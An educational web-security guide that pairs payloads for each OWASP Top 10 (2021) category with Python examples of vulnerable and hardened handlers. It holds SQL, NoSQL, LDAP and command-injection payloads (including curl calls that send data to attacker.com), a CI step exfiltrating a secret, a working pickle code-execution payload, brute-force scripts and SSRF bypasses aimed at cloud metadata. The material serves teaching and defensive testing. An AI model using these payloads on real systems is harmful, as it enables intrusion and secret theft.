Educational · intermediate · 5 min read

OWASP Top 10: Explained with Payloads

A practical guide to the OWASP Top 10 vulnerabilities with real payloads and examples for each category.

Tags: OWASP, web security, payloads, injection, XSS


The OWASP Top 10 represents the most critical web application security risks. This guide provides practical payloads and examples for each category (2021 edition).

A01:2021 – Broken Access Control

Access control enforces that users cannot act outside their intended permissions.

Vertical Privilege Escalation

Scenario: Regular user accessing admin functions

# Original request as regular user
GET /user/profile HTTP/1.1
Cookie: session=regular_user_token

# Try admin endpoint
GET /admin/users HTTP/1.1
Cookie: session=regular_user_token

Horizontal Privilege Escalation (IDOR)

Parameter manipulation:

# Original
GET /api/users/123/documents HTTP/1.1

# IDOR test
GET /api/users/124/documents HTTP/1.1
GET /api/users/1/documents HTTP/1.1

JSON body manipulation:

POST /api/transfer HTTP/1.1
Content-Type: application/json

{"from":"my_account","to":"other_account","amount":100}

# Modified
{"from":"victim_account","to":"my_account","amount":1000}
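The two requests above fail for the same reason: the server takes the object identity (the user id in the path, the "from" account in the body) from the request instead of from the session. The following is an added example, not code from the original post; the users, documents, account ids and the Forbidden type are constructed for it. It shows each handler written twice, once trusting the request and once checking ownership (with the admin role, the vertical case, checked server-side as well).

```python
# Added example: object-level authorization for the requests above.
# USERS, DOCUMENTS and ACCOUNT_OWNER are constructed sample data.

USERS = {
    "alice": {"id": 123, "role": "user"},
    "bob": {"id": 124, "role": "user"},
    "carol": {"id": 1, "role": "admin"},
}
DOCUMENTS = {123: ["alice-taxes.pdf"], 124: ["bob-contract.pdf"], 1: ["audit.log"]}
ACCOUNT_OWNER = {"acct-alice": "alice", "acct-bob": "bob"}


class Forbidden(Exception):
    """Raised when the session user may not act on the requested object."""


def list_documents_vulnerable(session_user, path_user_id):
    # GET /api/users/<path_user_id>/documents: the id in the URL is trusted
    # as-is, so any authenticated user can read any other user's documents.
    return list(DOCUMENTS.get(path_user_id, []))


def list_documents_hardened(session_user, path_user_id):
    # The id in the URL is compared against the identity from the session;
    # only the owner, or an admin (a role looked up server-side, never taken
    # from the request), may read the documents.
    me = USERS[session_user]
    if me["id"] != path_user_id and me["role"] != "admin":
        raise Forbidden(f"{session_user} may not read documents of user {path_user_id}")
    return list(DOCUMENTS.get(path_user_id, []))


def transfer_vulnerable(session_user, body, balances):
    # POST /api/transfer: "from" comes straight from the JSON body, so a
    # client can move money out of any account whose id it can guess.
    src, dst, amount = body["from"], body["to"], int(body["amount"])
    if amount <= 0 or balances[src] < amount:
        raise ValueError("invalid amount")
    balances[src] -= amount
    balances[dst] += amount
    return balances


def transfer_hardened(session_user, body, balances):
    # The source account must belong to the authenticated user; ownership is
    # checked against server-side data, not against anything the client sent.
    src, dst, amount = body["from"], body["to"], int(body["amount"])
    if ACCOUNT_OWNER.get(src) != session_user:
        raise Forbidden(f"{session_user} does not own {src}")
    if amount <= 0 or balances[src] < amount:
        raise ValueError("invalid amount")
    balances[src] -= amount
    balances[dst] += amount
    return balances
```

The pattern to look for in code review is the same in both handlers: any identifier that selects the object being read or changed must be either derived from the session or checked against an ownership record before use.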

Metadata Manipulation

# JWT manipulation: header {"alg":"HS256","typ":"JWT"}, payload {"role":"user"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoidXNlciJ9.xxx

# Payload changed to {"role":"admin"}, signature left untouched
# (only succeeds if the server never verifies the signature)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4ifQ.xxx

# Unsigned token: header {"alg":"none","typ":"JWT"} and an empty signature
# (succeeds if the server honours the alg claim chosen by the client; this is
# distinct from RS256-to-HS256 algorithm confusion, where the public key is used as the HMAC secret)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJyb2xlIjoiYWRtaW4ifQ.
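To see why the two forged tokens above succeed against some verifiers and not others, the following added example (not code from the original post) builds them with the standard library and checks them against two verifiers: one that trusts the alg claim in the header, and one that pins HS256 server-side. The secret is constructed for the example; no JWT library is used, so the encoding is visible.

```python
import base64
import hashlib
import hmac
import json

# Added example. The secret is constructed; a real server keeps it out of source.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def _encode_json(obj) -> str:
    # Compact separators give the same bytes as the tokens shown above.
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, key: bytes) -> str:
    """Server side: issue a legitimately signed HS256 token."""
    header = _encode_json({"alg": "HS256", "typ": "JWT"})
    body = _encode_json(payload)
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def forge_alg_none(payload: dict) -> str:
    """Attacker side: claim alg=none and send an empty signature."""
    header = _encode_json({"alg": "none", "typ": "JWT"})
    return f"{header}.{_encode_json(payload)}."


def swap_payload(token: str, payload: dict) -> str:
    """Attacker side: keep header and signature, replace only the claims."""
    header, _, sig = token.split(".")
    return f"{header}.{_encode_json(payload)}.{sig}"


def _split(token: str):
    parts = token.split(".")
    return parts if len(parts) == 3 else None


def verify_vulnerable(token: str, key: bytes):
    """Lets the token's author choose the algorithm."""
    parts = _split(token)
    if parts is None:
        return None
    h, b, s = parts
    header = json.loads(_b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(_b64url_decode(b))          # no signature check at all
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{h}.{b}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _b64url_decode(s)):
            return json.loads(_b64url_decode(b))
    return None


def verify_hardened(token: str, key: bytes):
    """Pins the algorithm server-side and always checks the MAC."""
    parts = _split(token)
    if parts is None:
        return None
    h, b, s = parts
    try:
        header = json.loads(_b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":                  # algorithm is configuration, not input
        return None
    expected = hmac.new(key, f"{h}.{b}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        return None
    return json.loads(_b64url_decode(b))
```

The payload swap is rejected by both verifiers because the HMAC no longer matches, so that trick only works where signatures are not checked at all; the alg=none token is the one that gets past a verifier that reads the algorithm from the header.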

Force Browsing

/admin/
/admin/dashboard
/administrator/
/management/
/backup/
/config/

A02:2021 – Cryptographic Failures

Sensitive data exposed due to weak or missing cryptography.

Detection Payloads

Check for HTTP where HTTPS needed:

curl -I http://target.com/login
# Look for redirect to HTTPS or sensitive data over HTTP

Check SSL/TLS configuration:

sslscan target.com
testssl.sh target.com

Common Issues to Check

# Sensitive data in URL
https://target.com/reset?token=abc123&email=user@test.com

# API keys in JavaScript
grep -rEi "api_?key|secret" --include='*.js' .

# Hardcoded credentials
grep -rEi "passw(or)?d\s*=" .
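The grep commands above are the quickest triage; the following added example (not code from the original post) does the same checks as a script so they can be run over a code base or a proxy log with line numbers and labels. The patterns are deliberately broad, the sample source is constructed, and the AWS key id is the documented example value, not a real credential.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example: regex triage for the "common issues" above.
SECRET_PATTERNS = {
    "hardcoded password": re.compile(
        r"""\b(passw(?:or)?d|pwd)\s*[:=]\s*['"][^'"]{4,}['"]""", re.I),
    "api key/secret assignment": re.compile(
        r"""\b(api_?key|secret(?:_?key)?|access_?token)\s*[:=]\s*['"][^'"]{8,}['"]""", re.I),
    "AWS access key id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private key block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}
# Parameters that must never travel in a query string (they end up in logs,
# Referer headers and browser history).
SENSITIVE_PARAMS = {"token", "password", "passwd", "secret", "email", "ssn", "session", "sid"}


def scan_source(text):
    """Return (line_number, finding, matched_text) for every hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in SECRET_PATTERNS.items():
            m = pattern.search(line)
            if m:
                hits.append((lineno, label, m.group(0)))
    return hits


def sensitive_params_in_url(url):
    """Names of sensitive query parameters present in the URL, sorted."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(k for k in query if k.lower() in SENSITIVE_PARAMS)


# Constructed sample: a few lines of client-side JavaScript.
SAMPLE_SOURCE = """\
const API_KEY = "sk_live_constructed_example_0123456789";
var password = "hunter2";
// aws creds pasted by mistake
const accessKeyId = "AKIAIOSFODNN7EXAMPLE";
fetch(API_URL, { headers: { Authorization: "Bearer " + token } });
const debug = true;
"""
```

Treat every hit as something to confirm by hand; the value of the script is that it also covers the reset URL case, which grep over source files does not see.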

A03:2021 – Injection

Untrusted data sent to an interpreter.

SQL Injection

Error-based:

' OR '1'='1'--
' OR '1'='1'/*
" OR "1"="1"--
') OR ('1'='1'--

Union-based:

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password,NULL FROM users--

Time-based blind:

# MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--

# PostgreSQL
' AND pg_sleep(5)--

# MSSQL
'; WAITFOR DELAY '0:0:5'--

Boolean-based blind:

# true condition
' AND '1'='1'--
# false condition
' AND '1'='2'--
' AND SUBSTRING(username,1,1)='a'--
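The payloads above only work because the input is pasted into the statement text. The following added example (not code from the original post) shows the same login query written both ways, with sqlite3 from the standard library standing in for the application's database and the table rows constructed for the example. Running the authentication-bypass and UNION payloads through both handlers shows the bypass and the dump against the formatted query and nothing against the parameterized one.

```python
import sqlite3

# Added example: the same handler, injectable and parameterized.


def make_db():
    # Constructed sample data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2"), ("admin", "adm1n-pass")],
    )
    return conn


def login_vulnerable(conn, username, password):
    # User input becomes part of the statement, so quotes, OR and -- in the
    # input are parsed as SQL.
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    # Bound parameters: the driver ships the values separately from the
    # statement text, so they can never change the query's structure.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    conn = make_db()
    return {
        # ' OR '1'='1'-- turns the WHERE clause into "username = '' OR '1'='1'"
        "auth bypass": login_vulnerable(conn, "' OR '1'='1'--", "wrong"),
        # UNION with one column, matching the SELECT it is appended to
        "union dump": login_vulnerable(conn, "' UNION SELECT password FROM users--", "wrong"),
        "safe bypass attempt": login_safe(conn, "' OR '1'='1'--", "wrong"),
        "safe valid login": login_safe(conn, "alice", "s3cret"),
    }
```

Note that the UNION payload here uses one column because the original SELECT returns one; the page's three-column version is for a query that returns three, which is why the NULL-counting payloads exist.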

NoSQL Injection

MongoDB:

{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}}

Command Injection

; ls -la
| cat /etc/passwd
`whoami`
$(id)
& ping -c 1 attacker.com &
|| curl attacker.com/$(whoami)

LDAP Injection

*)(uid=*))(|(uid=*
admin)(&)
*)(|(password=*))

A04:2021 – Insecure Design

Design flaws that cannot be fixed by perfect implementation.

Business Logic Testing

Rate limiting bypass:

# Multiple accounts
# Race conditions
# Parameter manipulation to skip steps
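The race-condition item above is the one that needs a demonstration: a limit that is checked and then updated in two steps can be passed by many requests at once. The following added example (not code from the original post) redeems a constructed one-use coupon from twenty threads released together; the check-then-act version over-redeems and the version that holds a lock across both steps does not.

```python
import threading
import time

# Added example: limit bypass through a race between check and update.


class Coupon:
    def __init__(self, code, uses_left):
        self.code = code                     # constructed
        self.uses_left = uses_left
        self.redeemed_by = []
        self.lock = threading.Lock()


def redeem_vulnerable(coupon, user):
    if coupon.uses_left > 0:                 # 1. check
        time.sleep(0.01)                     # the DB round-trip every request waits in
        coupon.uses_left -= 1                # 2. act: others already passed the check
        coupon.redeemed_by.append(user)
        return True
    return False


def redeem_hardened(coupon, user):
    with coupon.lock:                        # check and act form one critical section
        if coupon.uses_left > 0:
            time.sleep(0.01)
            coupon.uses_left -= 1
            coupon.redeemed_by.append(user)
            return True
    return False


def hammer(redeem, attempts=20):
    """Fire `attempts` redemptions at once; return how many succeeded."""
    coupon = Coupon("WELCOME10", uses_left=1)
    start = threading.Barrier(attempts)

    def worker(i):
        start.wait()                         # release all requests together
        redeem(coupon, f"user{i}")

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(attempts)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(coupon.redeemed_by)
```

A process-local lock only illustrates the fix; across several worker processes the equivalent is an atomic conditional update in the database (decrement only where uses_left > 0 and check the affected row count) or a lock held in a shared store. When testing, send the requests from one connection pool at the same instant, as the Barrier does here, rather than one after another.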

Workflow bypass:

# Skip payment step
POST /order/confirm HTTP/1.1
# Without going through /order/payment

A05:2021 – Security Misconfiguration

Missing hardening, default configs, verbose errors.

Default Credentials

admin:admin
admin:password
root:root
test:test
administrator:administrator

Directory Listing

/
/images/
/uploads/
/backup/
/temp/

Verbose Errors

# Trigger errors
GET /api/user/' HTTP/1.1
GET /api/user/{{invalid}} HTTP/1.1
GET /api/user/999999999999 HTTP/1.1

HTTP Headers Check

# Missing security headers
curl -sI https://target.com | grep -iE "x-frame|x-content|content-security|strict-transport"
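The grep above shows which header names are present; it does not tell you whether a present value is any good (an HSTS max-age of a few minutes, an X-Frame-Options value browsers ignore). The following added example (not code from the original post) parses a raw response and reports missing, weak and disclosing headers. The sample response is constructed.

```python
# Added example: a header audit that also judges values, not just presence.

EXPECTED = {
    "strict-transport-security": "max-age of at least one year, e.g. max-age=31536000; includeSubDomains",
    "content-security-policy": "a policy that at least restricts script-src",
    "x-content-type-options": "nosniff",
    "x-frame-options": "DENY or SAMEORIGIN (or a frame-ancestors CSP directive)",
}
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
ONE_YEAR = 31536000


def parse_headers(raw):
    """Parse 'Name: value' lines from a raw response; the status line is skipped."""
    headers = {}
    for line in raw.splitlines():
        if ":" not in line or line.startswith(("HTTP/", " ")):
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def audit_headers(raw):
    """Return a list of findings; an empty list means nothing to report."""
    h = parse_headers(raw)
    findings = []
    for name, hint in EXPECTED.items():
        if name not in h:
            findings.append(f"missing {name} (expected {hint})")
    hsts = h.get("strict-transport-security", "")
    if hsts:
        max_age = 0
        for part in hsts.split(";"):
            k, _, v = part.strip().partition("=")
            if k.lower() == "max-age" and v.strip().isdigit():
                max_age = int(v)
        if max_age < ONE_YEAR:
            findings.append(f"weak strict-transport-security: max-age={max_age} (< 1 year)")
    if h.get("x-content-type-options", "nosniff").lower() != "nosniff":
        findings.append("x-content-type-options is not 'nosniff'")
    xfo = h.get("x-frame-options", "").upper()
    if xfo and xfo not in ("DENY", "SAMEORIGIN"):
        findings.append(f"unsupported x-frame-options value {xfo!r}")
    for name in DISCLOSURE_HEADERS:
        if name in h:
            findings.append(f"version disclosure: {name}: {h[name]}")
    return findings


# Constructed sample response from a poorly configured server.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/7.4.3
Strict-Transport-Security: max-age=300
X-Frame-Options: ALLOWALL
Content-Type: text/html; charset=utf-8
"""
```

Feed it the output of `curl -sI` and treat the disclosure findings as input to the A06 component check.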

A06:2021 – Vulnerable Components

Using components with known vulnerabilities.

Detection

# Check JavaScript libraries
retire --path .

# Check npm packages
npm audit

# Check Python packages  
safety check

# Generic scanning
dependency-check --project test --scan .

Exploitation

Once identified, search:

site:exploit-db.com [component] [version]
site:github.com [component] CVE

A07:2021 – Identification and Authentication Failures

Weak authentication implementations.

Brute Force

# Hydra
hydra -l admin -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Custom script
while IFS= read -r pass; do
    curl -s -d "user=admin&pass=$pass" https://target.com/login | grep -q "Welcome" && echo "$pass"
done < passwords.txt

Session Attacks

# Session fixation
https://target.com/login?SESSIONID=attacker_controlled

# Session in URL
https://target.com/dashboard?sid=abc123

# Predictable session
# Check for sequential or predictable patterns

Password Reset Flaws

# Token leaked in the response body
POST /forgot-password HTTP/1.1
Content-Type: application/json

{"email":"victim@test.com"}

# Host header injection: if the reset link is built from the Host header,
# the victim's email carries a link to attacker.com with a valid token
POST /forgot-password HTTP/1.1
Host: attacker.com

# Token manipulation
https://target.com/reset?token=abc123&email=victim@test.com
https://target.com/reset?token=abc123&email=attacker@test.com
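The token manipulation above works when the server checks only that the token exists and then trusts the email parameter; the Host header case works when the link is built from the request. The following added example (not code from the original post) shows both reset handlers and both link builders side by side. The base URL, emails and token store are constructed for it.

```python
import hashlib
import hmac
import secrets

# Added example: reset tokens bound to the account, single use, with expiry.
BASE_URL = "https://target.com"             # constructed; comes from configuration
TOKEN_TTL = 15 * 60                         # seconds


def _token_hash(token):
    # Store only a hash: a leaked store does not yield usable tokens.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(store, email, now):
    """Create a random token bound to `email`; returns the token to e-mail."""
    token = secrets.token_urlsafe(32)
    store[_token_hash(token)] = {"email": email, "expires": now + TOKEN_TTL}
    return token


def reset_link_vulnerable(token, email, host_header):
    # Built from the Host header: attacker sets Host: attacker.com and the
    # victim's mail links there, carrying the live token.
    return f"https://{host_header}/reset?token={token}&email={email}"


def reset_link_hardened(token, email, host_header):
    # The request's Host header is ignored; the origin is configuration.
    return f"{BASE_URL}/reset?token={token}&email={email}"


def reset_password_vulnerable(store, users, token, email, new_password, now):
    # Only checks that the token exists, then trusts the email parameter:
    # the attacker's own token resets the victim's password.
    if _token_hash(token) in store:
        users[email] = new_password
        return True
    return False


def reset_password_hardened(store, users, token, email, new_password, now):
    rec = store.pop(_token_hash(token), None)          # single use, even on failure
    if rec is None or now > rec["expires"]:
        return False
    if not hmac.compare_digest(rec["email"], email):   # bound to the requesting account
        return False
    if email not in users:
        return False
    users[email] = new_password
    return True
```

The email parameter in the hardened link is redundant once the token is bound server-side; it is kept here only so the request shape matches the page's example.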

A08:2021 – Software and Data Integrity Failures

Code and infrastructure without integrity verification.

Insecure Deserialization

PHP:

O:8:"stdClass":1:{s:4:"test";s:4:"data";}

# Dangerous: the length prefix must match the class name (Malicious = 9 chars);
# it only does something if the app has a class with a __wakeup/__destruct that acts on "exec"
O:9:"Malicious":1:{s:4:"exec";s:6:"whoami";}

Java:

# ysoserial
java -jar ysoserial.jar CommonsCollections1 'calc.exe' | base64

Python pickle:

import os
import pickle

class Exploit:
    # pickle calls __reduce__ when dumping; the target's pickle.loads()
    # then calls os.system("whoami") while rebuilding the object
    def __reduce__(self):
        return (os.system, ("whoami",))

payload = pickle.dumps(Exploit())  # send wherever the application unpickles
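On the defending side, the useful question is how to tell, before calling load, whether a pickle like the one above would import anything, and how to load trusted shapes without giving the payload access to os. The following added example (not code from the original post) does both: it lists the globals a pickle references using pickletools, and it loads through an Unpickler whose find_class only admits an allowlist. It rebuilds the same Exploit payload as above, which is only ever pickled, never loaded with the stock pickle.loads.

```python
import io
import os
import pickle
import pickletools

# Added example: static triage plus a restricted loader for untrusted pickles.


class Exploit:
    # Same shape as the payload above; dumping it is harmless, loading runs whoami.
    def __reduce__(self):
        return (os.system, ("whoami",))


def referenced_globals(data):
    """List (module, name) pairs the pickle would import, without executing it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)                           # operands for STACK_GLOBAL
        elif op.name == "GLOBAL":                         # protocol <= 3: "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:   # protocol 4+
            found.append((strings[-2], strings[-1]))
    return found


class RestrictedUnpickler(pickle.Unpickler):
    # Only these globals may be resolved; everything else is an error.
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def triage(data):
    """Return ("blocked", reason) or ("loaded", obj); never runs os.system."""
    bad = [g for g in referenced_globals(data) if g not in RestrictedUnpickler.ALLOWED]
    if bad:
        return "blocked", f"references {bad}"
    try:
        return "loaded", safe_loads(data)
    except pickle.UnpicklingError as e:
        return "blocked", str(e)
```

The find_class restriction is the actual control (the genops pass is a cheap pre-filter and can be confused by unusual opcode sequences); even an allowlist only shrinks the attack surface, so for data from an untrusted source a format with no code-loading semantics, such as JSON, is the better fix.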

CI/CD Attacks

# Malicious workflow
steps:
  - run: curl attacker.com/$(cat /secrets/api_key)

A09:2021 – Security Logging and Monitoring Failures

Insufficient logging to detect attacks.

Log Injection

# "\n" below is a literal newline (CRLF) inside the value; a line-based log
# then shows a second, attacker-written record
User-Agent: Mozilla/5.0\n[CRITICAL] Admin logged in from 1.2.3.4
Username: admin\nSuccessful login
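The following added example (not code from the original post) takes the two payloads above through a logger that interpolates them verbatim, one that escapes control characters, and one that emits JSON records, then reads the output back the way a line-based log shipper would. The log lines are constructed.

```python
import json
import re

# Added example: log injection and two ways of closing it.

_CONTROL = re.compile(r"[\x00-\x1f\x7f]")   # CR, LF, ESC and other control bytes


def log_line_vulnerable(event, **fields):
    """Interpolates user-controlled values verbatim."""
    return f"[INFO] {event} " + " ".join(f"{k}={v}" for k, v in fields.items())


def sanitize(value):
    """Escape control characters so one value cannot span two log lines."""
    return _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), str(value))


def log_line_hardened(event, **fields):
    return f"[INFO] {event} " + " ".join(f"{k}={sanitize(v)}" for k, v in fields.items())


def log_json(event, **fields):
    """Structured alternative: JSON escaping keeps the record on one line."""
    return json.dumps({"level": "INFO", "event": event, **fields}, ensure_ascii=True)


def parse_records(text):
    """How a naive line-based log shipper sees the output."""
    return [line for line in text.split("\n") if line]


# The page's first payload, with the real newline it represents.
UA = "Mozilla/5.0\n[CRITICAL] Admin logged in from 1.2.3.4"
```

The escaped form keeps the evidence (the injected text is still in the record, visibly as \x0a) while denying the attacker a line of their own; structured records are preferable where the pipeline supports them.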

Testing Detection

Perform obvious attacks and check if:

  • Alerts are triggered
  • Logs capture the attempt
  • How quickly anyone notices and responds (time to detect)

A10:2021 – Server-Side Request Forgery (SSRF)

Server makes requests to unintended locations.

Basic SSRF

# Parameter
?url=http://127.0.0.1/admin
?url=http://localhost/admin
?url=http://[::1]/admin

# File protocol
?url=file:///etc/passwd

# Cloud metadata
?url=http://169.254.169.254/latest/meta-data/
?url=http://metadata.google.internal/

Bypass Techniques

# Decimal IP
http://2130706433/ (127.0.0.1)

# Hex IP
http://0x7f000001/

# Octal
http://0177.0.0.1/

# Parser differential (%23 is '#'): a validator that decodes first sees host 127.0.0.1,
# the HTTP client sees userinfo "127.0.0.1%23" and host evil.com, or the reverse
http://127.0.0.1%23@evil.com/

# DNS rebinding
http://evil.attacker.com/ (resolves to 127.0.0.1)

# IPv6
http://[::1]/
http://[0:0:0:0:0:ffff:127.0.0.1]/
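A destination check that only string-matches "127.0.0.1" and "localhost" misses every bypass form listed above. The following added example (not code from the original post) normalizes the host to an address first, including the decimal, hex, octal, IPv6 and IPv4-mapped forms, resolves names through an injectable resolver so the check can be tested offline, and allows only http(s) to globally routable addresses. The hostnames and the fake DNS table are constructed; the default resolver uses the system resolver.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example: SSRF destination validation that survives the bypass forms above.


def _legacy_ipv4(host):
    """Decode inet_aton-style forms: 2130706433, 0x7f000001, 0177.0.0.1, 127.1."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        try:
            if p[:2].lower() == "0x":
                values.append(int(p, 16))
            elif len(p) > 1 and p[0] == "0":
                values.append(int(p, 8))
            else:
                values.append(int(p, 10))
        except ValueError:
            return None
    *head, last = values
    if any(not 0 <= v <= 255 for v in head):
        return None
    tail_bits = 8 * (4 - len(head))            # the last component fills the rest
    if not 0 <= last < (1 << tail_bits):
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << tail_bits) | last)


def _as_literal(host):
    try:
        return ipaddress.ip_address(host)        # dotted quad or IPv6
    except ValueError:
        return _legacy_ipv4(host)


def _unmap(ip):
    """Treat ::ffff:127.0.0.1 as 127.0.0.1."""
    mapped = getattr(ip, "ipv4_mapped", None)
    return mapped if mapped is not None else ip


def system_resolver(host):
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_destination(url, resolve=system_resolver):
    """Return (allowed, reason). Only http(s) to public addresses passes."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    literal = _as_literal(host)
    if literal is not None:
        addresses = [literal]
    else:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolve(host)]
        except (socket.gaierror, KeyError, ValueError):
            return False, f"cannot resolve {host!r}"
    if not addresses:
        return False, f"no addresses for {host!r}"
    for ip in addresses:
        eff = _unmap(ip)
        if not eff.is_global:                    # loopback, private, link-local, reserved
            return False, f"{host!r} -> {eff} is not a public address"
    return True, f"{host!r} -> {addresses[0]}"
```

The check has to be paired with two more steps or DNS rebinding defeats it: connect to the address that was validated (send the name in the Host header) rather than resolving again, and re-run the check on every redirect the client follows.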

Blind SSRF

# Out-of-band: point the URL at a host you control (Burp Collaborator, interactsh) and watch for DNS/HTTP hits
?url=http://collaborator.net/
# A hit for a subdomain containing command output means the URL passed through a shell, not just an HTTP client
?url=http://$(whoami).attacker.com/

Quick Reference Cheat Sheet

Vulnerability   Quick Test
SQLi            ', ", ' OR '1'='1
XSS             <script>alert(1)</script>
SSRF            http://127.0.0.1
LFI             ../../../etc/passwd
RCE             ; id, `id`
IDOR            Change ID parameters
Auth            Default creds, brute force

Testing Methodology

  1. Understand the application — Map functionality
  2. Identify input points — Parameters, headers, cookies
  3. Test systematically — Each input, each vulnerability type
  4. Verify findings — Confirm exploitability
  5. Document everything — Evidence and impact

Need help testing your web applications? Contact us: m1k3@msquarellc.net
